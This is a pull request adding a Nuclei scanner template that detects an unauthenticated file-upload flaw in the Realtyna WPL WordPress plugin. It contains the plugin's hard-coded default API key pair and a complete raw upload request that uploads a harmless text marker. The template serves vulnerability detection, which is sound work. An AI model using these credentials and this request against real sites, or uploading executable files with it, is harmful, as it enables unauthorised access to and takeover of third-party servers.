### PR TITLE
Add CVE-2026-14483 Nuclei template

### DIFF
--- a/http/cves/2026/CVE-2026-14483.yaml
+++ b/http/cves/2026/CVE-2026-14483.yaml
@@ -1,0 +1,69 @@
+id: CVE-2026-14483
+
+info:
+  name: Realtyna Organic IDX/WPL WordPress Plugin <= 5.2.0 - Unauthenticated Arbitrary File Upload
+  author: str4k3r
+  severity: critical
+  description: |
+    WPL up to and including 5.2.0 seeds its I/O service authentication with a
+    static api_key/api_secret pair from the plugin's own SQL migration files;
+    these values are identical on every fresh installation. The unauthenticated
+    set_property command in the mobile_application command directory accepts a
+    multipart file named image_* and writes it below a newly created WPL
+    property without any file type validation. WPL 5.3.0 randomizes the
+    api_key/api_secret on activation, so the publicly known defaults no longer
+    authenticate. This probe uploads only harmless text to an
+    operator-provisioned disposable WordPress target and matches the measured
+    success response; it does not submit executable code or access a
+    production target.
+  remediation: Upgrade WPL to 5.3.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-14483
+    - https://plugins.trac.wordpress.org/browser/real-estate-listing-realtyna-wpl/trunk/libraries/services/io.php
+    - https://plugins.trac.wordpress.org/browser/real-estate-listing-realtyna-wpl/trunk/libraries/io/mobile_application/set_property.php
+    - https://wordpress.org/plugins/real-estate-listing-realtyna-wpl/
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-14483
+    cwe-id: CWE-434
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: realtyna
+    product: real-estate-listing-realtyna-wpl
+    verified-vulnerable: "official WordPress.org package 5.2.0"
+    verified-fixed: "official WordPress.org package 5.3.0"
+    verification: "V 3/3 DETECTED; F 3/3 NOT_DETECTED with native Nuclei v3.11.0"
+  tags: cve,cve2026,wordpress,wp-plugin,wpl,realtyna,file-upload,unauth
+
+variables:
+  probe_filename: "image_CVE14483_{{rand_base(10)}}.txt"
+  public_key: "U7hdbv673YhdjplzzX7wU7hdbv673YhdjplzzX7w"
+  private_key: "Eft76bdh0o2uyhJkbG3T"
+  commands_directory: "mobile_application"
+  user_id: "1"
+
+http:
+  - raw:
+      - |
+        POST /?wplformat=io&wplview=io&public_key={{url_encode(public_key)}}&private_key={{url_encode(private_key)}}&commands_directory={{url_encode(commands_directory)}}&cmd=set_property&user_id={{user_id}}&dformat=json HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----CVE14483Boundary
+
+        ------CVE14483Boundary
+        Content-Disposition: form-data; name="file[]"; filename="{{probe_filename}}"
+        Content-Type: text/plain
+
+        CVE14483_SAFE_MARKER
+        ------CVE14483Boundary--
+
+    matchers-condition: and
+    matchers:
+      - type: status
+        status:
+          - 200
+      - type: word
+        part: body
+        words:
+          - '"result":{"success":true'


### PR DESCRIPTION
Adds a parameterized Nuclei template for CVE-2026-14483. Any required setup, seed, authentication, or callback values are exposed as scan-time variables; no forge-local target address is embedded. Native Nuclei validation passed, and the local ledger records the vulnerable/fixed differential as 3/3 detected versus 3/3 not detected.